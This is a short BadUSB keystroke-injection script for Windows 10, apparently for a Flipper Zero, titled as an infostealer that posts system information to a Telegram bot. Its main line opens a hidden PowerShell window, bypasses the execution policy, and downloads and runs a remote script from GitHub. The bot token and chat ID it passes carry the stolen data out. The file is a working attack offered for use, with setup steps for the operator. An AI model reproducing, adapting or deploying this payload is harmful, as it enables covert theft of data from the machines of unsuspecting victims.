
REM Title: beigeworm's system information to Telegram Bot
REM Author: @beigeworm
REM Description: This script gathers system information and posts to Telegram Bot Chat with the results.
REM Target: Windows 10

REM *SETUP*
REM replace BOT_TOKEN with your Telegram bot token.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Telegram-Infostealer/main.ps1 | iex
ENTER

